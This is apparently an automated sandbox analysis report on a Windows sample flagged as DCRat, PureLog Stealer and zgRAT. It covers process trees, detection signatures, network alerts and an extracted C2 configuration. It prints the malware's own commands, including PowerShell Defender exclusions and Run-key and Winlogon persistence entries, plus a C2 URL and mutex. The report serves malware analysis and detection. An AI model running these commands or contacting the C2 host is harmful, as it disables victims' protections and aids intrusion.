Windows Analysis Report
PlZA6b48MW.exe

Overview

General Information

Sample name:PlZA6b48MW.exe
renamed because original name is a hash value
Original sample name:32db4bf35b9c2efc730718e2f8cd4fbc.exe
Analysis ID:1586157
MD5:32db4bf35b9c2efc730718e2f8cd4fbc
SHA1:616a5c549f6c1c191f82d8cea82c65e25869241e
SHA256:2fb0b933c97aa9b37e31f7adf38695e8185b61c7d312c183f05fd4256ef38497
Tags:DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Allocates memory with a write watch (potentially for evading sandboxes)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PlZA6b48MW.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\PlZA6b48MW.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
    • csc.exe (PID: 7480 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7532 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC13.tmp" "c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7912 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7920 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7936 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7560 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7972 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8012 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8036 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3084 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7588 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7740 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • PlZA6b48MW.exe (PID: 8380 cmdline: "C:\Users\user\Desktop\PlZA6b48MW.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
        • cmd.exe (PID: 8588 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 8636 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • w32tm.exe (PID: 8648 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
  • dllhost.exe (PID: 7392 cmdline: "C:\Program Files\Windows Multimedia Platform\dllhost.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • dllhost.exe (PID: 7528 cmdline: "C:\Program Files\Windows Multimedia Platform\dllhost.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • PlZA6b48MW.exe (PID: 7512 cmdline: C:\Users\user\Desktop\PlZA6b48MW.exe MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • PlZA6b48MW.exe (PID: 7508 cmdline: C:\Users\user\Desktop\PlZA6b48MW.exe MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • WtHZilDMhVnOIkoIfPBLn.exe (PID: 7696 cmdline: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • WtHZilDMhVnOIkoIfPBLn.exe (PID: 7684 cmdline: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • PlZA6b48MW.exe (PID: 8256 cmdline: "C:\Users\user\Desktop\PlZA6b48MW.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
    • cmd.exe (PID: 8408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8456 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 8500 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • PlZA6b48MW.exe (PID: 8836 cmdline: "C:\Users\user\Desktop\PlZA6b48MW.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
  • WtHZilDMhVnOIkoIfPBLn.exe (PID: 8696 cmdline: "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe" MD5: 32DB4BF35B9C2EFC730718E2F8CD4FBC)
    • cmd.exe (PID: 8864 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": "http://505905cm.n9shka.top/imagePollLinuxCentral", "MUTEX": "DCR_MUTEX-e0MEoQzZAqT5aSFnG7OI", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
PlZA6b48MW.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
PlZA6b48MW.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files\Windows Multimedia Platform\dllhost.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files\Windows Multimedia Platform\dllhost.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000000.00000000.1660573401.0000000000062000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: PlZA6b48MW.exe PID: 7332 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: PlZA6b48MW.exe PID: 8256 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.PlZA6b48MW.exe.60000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.PlZA6b48MW.exe.60000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                            System Summary

                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\PlZA6b48MW.exe, ProcessId: 7332, TargetFilename: C:\Program Files\Windows Multimedia Platform\dllhost.exe
                            Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PlZA6b48MW.exe, ProcessId: 7332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WtHZilDMhVnOIkoIfPBLn
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PlZA6b48MW.exe", ParentImage: C:\Users\user\Desktop\PlZA6b48MW.exe, ParentProcessId: 7332, ParentProcessName: PlZA6b48MW.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', ProcessId: 7912, ProcessName: powershell.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Windows Multimedia Platform\dllhost.exe", CommandLine: "C:\Program Files\Windows Multimedia Platform\dllhost.exe", CommandLine|base64offset|contains: 2mg, Image: C:\Program Files\Windows Multimedia Platform\dllhost.exe, NewProcessName: C:\Program Files\Windows Multimedia Platform\dllhost.exe, OriginalFileName: C:\Program Files\Windows Multimedia Platform\dllhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files\Windows Multimedia Platform\dllhost.exe", ProcessId: 7392, ProcessName: dllhost.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PlZA6b48MW.exe, ProcessId: 7332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PlZA6b48MW
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PlZA6b48MW.exe, ProcessId: 7332, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\PlZA6b48MW.exe", ParentImage: C:\Users\user\Desktop\PlZA6b48MW.exe, ParentProcessId: 7332, ParentProcessName: PlZA6b48MW.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", ProcessId: 7480, ProcessName: csc.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PlZA6b48MW.exe", ParentImage: C:\Users\user\Desktop\PlZA6b48MW.exe, ParentProcessId: 7332, ParentProcessName: PlZA6b48MW.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', ProcessId: 7912, ProcessName: powershell.exe
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\PlZA6b48MW.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PlZA6b48MW.exe", ParentImage: C:\Users\user\Desktop\PlZA6b48MW.exe, ParentProcessId: 7332, ParentProcessName: PlZA6b48MW.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe', ProcessId: 7912, ProcessName: powershell.exe

                            Data Obfuscation

                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\PlZA6b48MW.exe", ParentImage: C:\Users\user\Desktop\PlZA6b48MW.exe, ParentProcessId: 7332, ParentProcessName: PlZA6b48MW.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline", ProcessId: 7480, ProcessName: csc.exe
                            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                            2025-01-08T19:22:12.441622+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:22:16.937599+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49735 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:22:23.010082+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:22:26.775231+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:22:49.408027+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:22:58.845549+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:23:01.873573+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49769 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:23:09.111175+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49805 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:23:12.439331+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49826 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:23:15.569473+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49841 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:23:19.060915+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49856 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:23:45.937610+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49998 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:23:54.634534+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50016 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:23:58.095640+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50017 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:24:02.259011+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50018 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:24:20.595673+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50019 | 37.44.238.250 | 80 | TCP
                            2025-01-08T19:24:31.736429+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 50020 | 37.44.238.250 | 80 | TCP

                            AV Detection

                            Source: PlZA6b48MW.exeAvira: detected
                            Source: http://505905cm.n9shka.top/imagePollLinuxCentral.phpAvira URL Cloud: Label: malware
                            Source: http://505905cm.n9shka.topAvira URL Cloud: Label: malware
                            Source: http://505905cm.n9shka.top/Avira URL Cloud: Label: malware
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\GogtzRNUlL.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\Desktop\CwRRQJIe.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                            Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Users\user\AppData\Local\Temp\wA41hAKrBM.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                            Source: C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.batAvira: detection malicious, Label: BAT/Delbat.C
                            Source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://505905cm.n9shka.top/imagePollLinuxCentral", "MUTEX": "DCR_MUTEX-e0MEoQzZAqT5aSFnG7OI", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exeReversingLabs: Detection: 73%
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeReversingLabs: Detection: 73%
                            Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeReversingLabs: Detection: 73%
                            Source: C:\Users\Default\AppData\Roaming\WtHZilDMhVnOIkoIfPBLn.exeReversingLabs: Detection: 73%
                            Source: C:\Users\user\Desktop\CwRRQJIe.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\IXnYeTUQ.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\LARQmQKJ.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\MiiYvNyr.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\OeqoqbNM.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\RCSpyiiu.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\YNJEaDTu.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\ZBNMMRPs.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\bTenUpua.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\dZJDzodr.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\euKdPjTG.logReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\kAfKNzod.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\kkpLxnoP.logReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\mSTLtqAw.logReversingLabs: Detection: 25%
                            Source: C:\Users\user\Desktop\nIcTiRiZ.logReversingLabs: Detection: 70%
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeReversingLabs: Detection: 73%
                            Source: PlZA6b48MW.exeReversingLabs: Detection: 73%
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\CwRRQJIe.logJoe Sandbox ML: detected
                            Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeJoe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\Desktop\FvWYGyIe.logJoe Sandbox ML: detected
                            Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exeJoe Sandbox ML: detected
                            Source: PlZA6b48MW.exeJoe Sandbox ML: detected
                            Source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
                            Source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-e0MEoQzZAqT5aSFnG7OI","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                            Source: 00000000.00000002.1808136284.000000001263C000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://505905cm.n9shka.top/","imagePollLinuxCentral"]]
                            Source: PlZA6b48MW.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exe, Directory created: C:\Program Files\Windows Multimedia Platform\dllhost.exe
